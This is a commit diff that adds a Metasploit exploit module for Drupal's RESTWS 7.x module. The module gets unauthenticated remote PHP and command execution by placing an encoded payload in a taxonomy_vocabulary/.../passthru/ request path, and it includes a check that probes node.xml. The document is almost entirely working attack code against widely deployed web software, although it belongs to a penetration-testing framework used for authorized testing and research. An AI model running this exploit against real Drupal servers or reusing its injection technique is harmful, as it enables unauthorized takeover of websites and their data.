Add Drupal RESTWS Remote Unauth PHP Code Exec

mdisec · mdisec · commit c8deb5493885 · 2016-07-18T21:32:10.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
+      'Description'    => %q{
+        This module exploits the Drupal RESTWS module vulnerability.
+        RESTWS alters the default page callbacks for entities to provide
+        additional functionality. A vulnerability in this approach allows
+        an unauthenticated attacker to send specially crafted requests resulting
+        in arbitrary PHP execution
+
+        This module was tested against RESTWS 7.x with Drupal 7.5 installation on Ubuntu server.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Devin Zuczek',                        # discovery
+          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.drupal.org/node/2765567']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'generic python',
+            }
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'Jul 13 2016',
+      'DefaultTarget'  => 0
+      ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    url = normalize_uri(target_uri.path, "node.xml")
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+    if res && res.code == 403
+      return Exploit::CheckCode::Appears
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    r = rand_text_alpha(4 + rand(4))
+    url = normalize_uri(target_uri.path, "taxonomy_vocabulary/" + r + "/passthru/" + Rex::Text.uri_encode(payload.encoded))
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => url
+    )
+  end
+end
